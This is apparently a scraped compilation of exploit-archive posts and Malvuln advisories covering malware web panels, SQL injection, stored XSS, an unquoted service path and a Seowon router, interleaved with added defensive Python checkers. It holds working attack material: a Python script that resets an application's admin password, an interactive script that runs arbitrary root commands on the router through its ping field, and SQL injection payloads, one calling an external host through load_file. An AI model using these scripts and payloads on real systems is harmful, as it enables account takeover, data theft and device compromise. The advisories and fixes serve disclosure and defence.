<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/c4cc1317aea42f7dd4a1b786c5278a24_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Hades RAT - Web Panel<br />Vulnerability: Information Disclosure<br />Description: The Hades Rat web-panel listens on Port 80. There is no authentication check or default .htaccess file protecting the root directory. Third-party attackers who can reach the web-panel can read the INI file disclosing the password.<br />Family: Hades<br />Type: WebUI<br />MD5: c4cc1317aea42f7dd4a1b786c5278a24<br />MD5: a117b7fa4691b766dd5aa6455438fded (strings.ini)<br />Vuln ID: MVID-2022-0513<br />Disclosure: 03/13/2022<br /><br />Exploit/PoC:<br />C:\>curl http://HADES_RAT_IP/WebPanel/strings.ini<br />[identifiant]<br />mdp = "megapass"<br /><br />[strings]<br />error_mdp = "Error Password False..."<br /><br />form_mdp = "Please put your password."<br />form_valid = "Send !"<br /><br />com_header = "Write your commands for your bot(s)"<br />com1 = "DDOS Commands (ex: 127.0.0.1)"<br />com2 = "Download / Execute Commands (ex: http://www.site.com/dl.exe)"<br />com3 = "Stop DDOS or Restart Commands (ex: Restart)"<br /><br />titre = "Hadès RAT - WebPanel"<br /><br />[images]<br />header = "images/header.png"<br />header_mdp = "images/lock.png"<br />C:\><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/c4cc1317aea42f7dd4a1b786c5278a24.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Hades RAT - Web Panel<br />Vulnerability: Insecure Credential Storage<br />Family: Hades<br />Type: WebUI<br />MD5: c4cc1317aea42f7dd4a1b786c5278a24<br />MD5: a117b7fa4691b766dd5aa6455438fded (strings.ini)<br />Vuln ID: MVID-2022-0512<br />Disclosure: 03/13/2022<br />Description: The Hades Rat malware web-panel listens on Port 80 and stores its weak password "megapass" in plaintext in the strings.ini file.<br /><br />Exploit/PoC:<br />"strings.ini"<br /><br />[identifiant]<br />mdp = "megapass"<br /><br />[strings]<br />error_mdp = "Error Password False..."<br /><br />form_mdp = "Please put your password."<br />form_valid = "Send !"<br /><br />com_header = "Write your commands for your bot(s)"<br />....<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/baf102927947289e4d589028620ce291.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: RedLine.MainPanel - cracked.exe<br />Vulnerability: Insecure Permissions<br />Description: The malware writes PE files with insecure permissions to the root of the C: drive, granting change (C) permission to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Family: RedLine<br />Type: PE32<br />MD5: baf102927947289e4d589028620ce291<br />Vuln ID: MVID-2022-0511<br />Disclosure: 03/13/2022<br /><br />Exploit/PoC:<br />C:\>cacls Build.exe<br />C:\Build.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir Build.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />03/04/2022 02:24 AM 144,384 Build.exe<br /> 1 File(s) 144,384 bytes<br /> 0 Dir(s) 25,982,451,712 bytes free<br /></code></pre>
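As an added check (not part of the Malvuln advisory), the following Python parses `cacls` output of the kind shown above and flags any ACE that gives Authenticated Users, Users or Everyone change, full or write rights on the file. The sample input is the advisory's own `cacls Build.exe` output; the set of trustees to flag is an assumption to adjust per environment.

```python
import re

# Trustees that should never be able to modify an executable dropped in C:\
# (assumption: adjust this set to the environment being audited).
LOW_PRIV_GROUPS = {
    "NT AUTHORITY\\Authenticated Users",
    "BUILTIN\\Users",
    "Everyone",
}
# cacls right letters that permit changing the file: C (change), F (full), W (write).
WRITE_RIGHTS = set("CFW")

# cacls output quoted from the RedLine advisory above.
SAMPLE = r"""C:\Build.exe BUILTIN\Administrators:(ID)F
 NT AUTHORITY\SYSTEM:(ID)F
 BUILTIN\Users:(ID)R
 NT AUTHORITY\Authenticated Users:(ID)C
"""


def audit_cacls(path, output):
    """Return (trustee, rights) pairs from cacls output for `path` that let a
    low-privileged trustee modify the file."""
    findings = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()  # the first ACE shares its line with the path
        if not line:
            continue
        trustee, sep, rights = line.partition(":")
        if not sep:
            continue  # continuation lines of a "special access" entry carry no ':'
        if trustee not in LOW_PRIV_GROUPS:
            continue
        if "special access" in rights:
            # cacls lists the individual rights on the following lines; review by hand.
            findings.append((trustee, "special access (review manually)"))
            continue
        letters = re.sub(r"\([^)]*\)", "", rights)  # drop (OI)(CI)(ID) inheritance flags
        if WRITE_RIGHTS.intersection(letters):
            findings.append((trustee, letters))
    return findings


if __name__ == "__main__":
    for trustee, rights in audit_cacls(r"C:\Build.exe", SAMPLE):
        print("weak ACL on C:\\Build.exe: %s has %s" % (trustee, rights))
```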
<pre><code># Exploit Title: Automatic Question Paper Generator System 1.0 - Cross-site scripting stored<br /># Date: 2022-11-03<br /># Exploit Author: Mr Empy<br /># Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Linux<br /><br />Title:<br />================<br />Automatic Question Paper Generator System 1.0 - Cross-site scripting stored<br /><br /><br />Summary:<br />================<br />The Automatic Question Paper Generator in version 1.0 is vulnerable to<br />arbitrary persistent JavaScript code injection (stored XSS), which can lead to<br />abuse of browser resources and session cookie theft.<br /><br /><br />Severity Level:<br />================<br />7.5 (High)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N<br /><br /><br />Affected Product:<br />================<br />Automatic Question Paper Generator v1.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open your browser, create an account on the site and log into it<br />(http://target.com/aqpg/users/login.php).<br /><br />2. Click on your profile icon and then click on My Account. The fields<br />named "First Name", "Middle Name" and "Last Name" are vulnerable to XSS;<br />inject the payload into one of them and then save your changes.<br /></code></pre>
<pre><code># Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path<br /># Date: 11/03/2022<br /># Exploit Author: Faisal Alasmari <br /># Vendor Homepage: https://www.vive.com/<br /># Software Link: https://developer.vive.com/resources/downloads/<br /># Version: 1.0.0.4<br /># Tested: Windows 10 x64<br /><br /><br /><br />C:\Users\User>sc qc "VIVE Runtime Service"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: VIVE Runtime Service<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : VIVE Runtime Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
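An added example, not from the advisory or from VIVE: parse `sc qc` output like the listing above, flag an unquoted image path that contains spaces, and produce the quoted `binPath` value that remediates it. The sample is the advisory's own `sc qc` output; splitting the image path at the first `.exe` is a heuristic assumption.

```python
# sc qc output quoted from the advisory above (column alignment as sc prints it).
SAMPLE = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VIVE Runtime Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VIVE Runtime Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def binary_path(sc_qc_output):
    """Extract BINARY_PATH_NAME from `sc qc` output."""
    for line in sc_qc_output.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "BINARY_PATH_NAME":
            return value.strip()
    raise ValueError("BINARY_PATH_NAME not found")


def image_path(binpath):
    """The executable part of an unquoted BINARY_PATH_NAME, without trailing
    arguments. Heuristic assumption: the image ends at the first '.exe'."""
    idx = binpath.lower().find(".exe")
    return binpath if idx == -1 else binpath[:idx + 4]


def is_unquoted_with_spaces(binpath):
    """True when the image path is unquoted and contains a space. Windows then tries
    every space-delimited prefix (C:\\Program.exe, ...) before the intended binary,
    which is the condition the advisory reports."""
    if binpath.startswith('"'):
        return False
    return " " in image_path(binpath)


def quoted_binpath(binpath):
    """Remediated value: the image path in quotes, arguments untouched. Apply it with
    sc config "VIVE Runtime Service" binPath= followed by this value, with the inner
    quotes escaped as \\" (note the space after binPath=)."""
    if not is_unquoted_with_spaces(binpath):
        return binpath
    image = image_path(binpath)
    return '"%s"%s' % (image, binpath[len(image):])


if __name__ == "__main__":
    path = binary_path(SAMPLE)
    if is_unquoted_with_spaces(path):
        print("UNQUOTED: %s" % path)
        print("fix:      %s" % quoted_binpath(path))
```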
<pre><code># Exploit Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass<br /># Date: 2022-04-03<br /># Exploit Author: Mr Empy<br /># Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Linux<br />#!/usr/bin/env python3<br />import requests<br />import random<br />import string<br />from requests_toolbelt import MultipartEncoder<br />from time import sleep<br />import argparse<br /><br />def banner():<br />    print('''<br /> ___ ____ ____ ______<br /> / | / __ \ / __ \/ ____/<br /> / /| |/ / / / / /_/ / / __<br /> / ___ / /_/ / / ____/ /_/ /<br /> /_/ |_\___\_\/_/ \____/<br /><br />[Automatic Question Paper Generator v1.0]<br /> [Authentication Bypass]<br />''')<br /><br />def main():<br />    fields = {<br />        'id': "1",<br />        'firstname': 'Adminstrator',<br />        'lastname': 'Admin',<br />        'username': 'admin',<br />        'password': arguments.newpassword<br />    }<br /><br />    boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))<br />    m = MultipartEncoder(fields=fields, boundary=boundary)<br /><br />    headers = {<br />        "Connection": "keep-alive",<br />        "Content-Type": m.content_type<br />    }<br /><br />    r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m)<br />    if '1' in r.text:<br />        print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}')<br />    else:<br />        print('[-] Not vulnerable')<br /><br />if __name__ == '__main__':<br />    parser = argparse.ArgumentParser()<br />    parser.add_argument('-u','--url', action='store', help='Target URL (http://target.com/aqpg/)', dest='url', required=True)<br />    parser.add_argument('-p','--password', action='store', help='New password', dest='newpassword', required=True)<br />    arguments = parser.parse_args()<br />    banner()<br />    sleep(2)<br />    main()<br /></code></pre>
<pre><code>## Title: Student Grading System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.14.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Student-Grading-System<br /><br />## Description:<br />The `user` parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the user parameter, and a database<br />error message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br />You should review the contents of the error message, and the<br />application's handling of other input, to confirm whether a<br />vulnerability is present.<br />An attacker can take control of the administrator account and of all<br />other accounts and file information on this system, and can download<br />all information stored in it.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: user (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: user=-6693' OR 2950=2950-- qPwW&pwd=d0Y!w7s!B1<br /><br /> Type: UNION query<br /> Title: Generic UNION query (random number) - 6 columns<br /> Payload: user=-7952' UNION ALL SELECT<br />5650,5650,CONCAT(0x71786a7a71,0x7564497973726b65496f6e5778706143684359517149546e46776d6843484a504e624e7967484c57,0x716b627171),5650,5650,5650--<br />-&pwd=d0Y!w7s!B1<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Student-Grading-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/h0x4xl)<br /><br /><br /></code></pre>
<pre><code>## Title: Insurance Management System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 03.12.2022<br />## Vendor: https://itsourcecode.com/free-projects/php-project/php-projects-source-code-free-downloads/<br />## Software: https://itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/itsourcecode.com/Insurance-Management-System<br /><br />## Description:<br />The username parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\xek'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />An attacker can take control of the administrator account and of all<br />other accounts on this system, and can download all information<br />stored in it.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: username=GvWNfNIz'+(select<br />load_file('\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\xek'))+''<br />AND 7122=(SELECT (CASE WHEN (7122=7122) THEN 7122 ELSE (SELECT 6385<br />UNION SELECT 2068) END))-- -&password=y6E!b3n!T9<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=GvWNfNIz'+(select<br />load_file('\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\xek'))+''<br />AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x7178767671,(SELECT<br />(ELT(3405=3405,1))),0x7178627871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zJzm&password=y6E!b3n!T9<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=GvWNfNIz'+(select<br />load_file('\\\\9hrdmiwt98pph06kzx56a8hv7mdf17pysmk9axz.itsourcecode.com/free-projects/php-project/insurance-management-system-project-in-php-free-download/\\xek'))+''<br />AND (SELECT 5739 FROM (SELECT(SLEEP(5)))crqV)--<br />pBFE&password=y6E!b3n!T9<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/itsourcecode.com/Insurance-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/iyml42)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Baixar GLPI Project 9.4.6 - SQLi<br /># Date: 10/12<br /># Exploit Author: Joas Antonio<br /># Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/<br /># Software Link: https://glpi-project.org/pt-br/baixar/<br /># Version: GLPI - 9.4.6<br /># Tested on: Windows/Linux<br /># CVE : CVE-2021-44617<br /><br />#POC1:<br />plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111<br /><br />sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"<br /><br /></code></pre>
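The probe described in the Student Grading System advisory (one single quote produces a database error, two do not) and the boolean-based payloads in the Student Grading System, Insurance Management System and GLPI advisories above all stem from untrusted input being spliced into the SQL text. This added example (not code from any of those PHP/MySQL applications; it uses a constructed in-memory SQLite table as a stand-in) reproduces that probe behaviour with a concatenated login query and shows the parameterized query that fixes it.

```python
import sqlite3

# The two probes the Student Grading System advisory describes.
PROBES = (("one quote", "x'"), ("two quotes", "x''"))


def make_db():
    """Constructed stand-in for the application's user table (not the real schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, pwd TEXT, role TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret', 'admin')")
    return con


def login_vulnerable(con, user, pwd):
    """Concatenated query: the submitted values become part of the SQL text, so a
    quote in them changes the statement's structure."""
    sql = "SELECT role FROM users WHERE user='%s' AND pwd='%s'" % (user, pwd)
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(con, user, pwd):
    """Parameterized query: the driver binds the values; quotes stay data."""
    sql = "SELECT role FROM users WHERE user=? AND pwd=?"
    row = con.execute(sql, (user, pwd)).fetchone()
    return row[0] if row else None


def probe(login, con):
    """Run the advisory's two probes through a login function and report, per probe,
    whether the database raised a syntax error ('error') or not ('ok')."""
    outcome = {}
    for name, value in PROBES:
        try:
            login(con, value, "whatever")
            outcome[name] = "ok"
        except sqlite3.OperationalError:
            outcome[name] = "error"
    return outcome


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", probe(login_vulnerable, con))  # one quote errors, two do not
    print("fixed:     ", probe(login_fixed, con))       # neither errors
    # The advisory's boolean-based payload logs in without a password on the
    # concatenated query and is just an unknown username on the parameterized one.
    payload = "-6693' OR 2950=2950-- qPwW"
    print("vulnerable login:", login_vulnerable(con, payload, "anything"))
    print("fixed login:     ", login_fixed(con, payload, "anything"))
```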
<pre><code># Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)<br /># Date: 2022-03-11<br /># Exploit Author: Aryan Chehreghani<br /># Vendor Homepage: http://www.seowonintech.co.kr<br /># Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30<br /># Version: All versions<br /># Tested on: Windows 10 Enterprise x64, Linux<br /># CVE : CVE-2020-17456<br /><br /># [ About - Seowon SLR-120 router ]:<br /><br /># The SLR-120 series provides consistent access to LTE networks and turns it into your own hotspot while you are on the move.<br /># The convenience of sharing wireless internet access invigorates your lifestyle, family,<br /># friends and workmates. Carry it around to boost your active communication anywhere.<br /><br /># [ Description ]:<br /><br /># Executes commands without authentication as the admin user.<br /># It works on all versions: enter the router IP and port (if any) in the script and commands are executed as the root user.<br /><br /># [ Vulnerable products ]:<br /><br /># SLR-120S42G<br /># SLR-120D42G<br /># SLR-120T42G<br /><br />import requests<br /><br />print ('''<br />###########################################################<br /># Seowon SLR-120S42G router - RCE (Unauthenticated) #<br /># BY:Aryan Chehreghani #<br /># Team:TAPESH DIGITAL SECURITY TEAM IRAN #<br /># mail:aryanchehreghani@yahoo.com #<br /># -+-USE:python script.py #<br /># Example Target : http://192.168.1.1:443/ #<br />###########################################################<br />''')<br /><br />url = input ("=> Enter Target : ")<br /><br />while(True):<br /><br />    try:<br /><br />        cmd = input ("~Enter Command $ ")<br /><br />        header = {<br />            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",<br />            "Accept": "*/*",<br />            "Accept-Language": "en-US,en;q:0.5",<br />            "Accept-Encoding": "gzip, deflate",<br />            "Content-Type": "application/x-www-form-urlencoded",<br />            "Content-Length": "207",<br />            "Origin": "http://192.168.1.1",<br />            "Connection": "close",<br />            "Referer": "http://192.168.1.1/",<br />            "Upgrade-Insecure-Requests": "1"<br />        }<br /><br />        datas = {<br />            'Command':'Diagnostic',<br />            'traceMode':'ping',<br />            'reportIpOnly':'',<br />            'pingIpAddr':';'+cmd,<br />            'pingPktSize':'56',<br />            'pingTimeout':'30',<br />            'pingCount':'4',<br />            'maxTTLCnt':'30',<br />            'queriesCnt':'3',<br />            'reportIpOnlyCheckbox':'on',<br />            'logarea':'com.cgi',<br />            'btnApply':'Apply',<br />            'T':'1646950471018'<br />        }<br /><br />        x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)<br /><br />        print(x.text)<br /><br />    except:<br />        break<br /></code></pre>
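The PoC above works because the `pingIpAddr` form field reaches a shell unchanged. As an added example of the hardened form of that diagnostic handler (not the router's firmware code; the `ping` flags assume Linux iputils, and the field names are the ones the PoC posts), the target is validated as an IP address or hostname and `ping` is invoked without a shell, so `;`-separated commands are rejected instead of executed.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def validate_target(value):
    """Return the ping target if it is an IP address or a hostname, else raise
    ValueError. Shell metacharacters (';', '|', '$(' ...) fail both branches."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError("invalid ping target: %r" % value)


def is_valid_target(value):
    try:
        validate_target(value)
        return True
    except ValueError:
        return False


def build_ping_argv(target, count=4, size=56, timeout=30):
    """argv for ping (iputils flags assumed: -c count, -s bytes, -W seconds).
    Numeric fields are range-checked and the target validated; no shell is used,
    so nothing in the arguments can be interpreted as a second command."""
    limits = {"count": (count, 10), "size": (size, 1472), "timeout": (timeout, 60)}
    for name, (val, upper) in limits.items():
        if type(val) is not int or val not in range(1, upper + 1):
            raise ValueError("%s out of range: %r" % (name, val))
    return ["ping", "-c", str(count), "-s", str(size), "-W", str(timeout),
            validate_target(target)]


def run_diagnostic(form):
    """Handle a submitted diagnostic form (same field names as the PoC's `datas`);
    non-numeric or out-of-range fields raise ValueError before anything runs."""
    argv = build_ping_argv(form["pingIpAddr"], int(form.get("pingCount", 4)),
                           int(form.get("pingPktSize", 56)), int(form.get("pingTimeout", 30)))
    done = subprocess.run(argv, capture_output=True, text=True, timeout=90)
    return done.stdout


if __name__ == "__main__":
    for field in ("127.0.0.1", "example.com", ";id", "127.0.0.1;id"):
        print("%-16s %s" % (field, "accepted" if is_valid_target(field) else "rejected"))
```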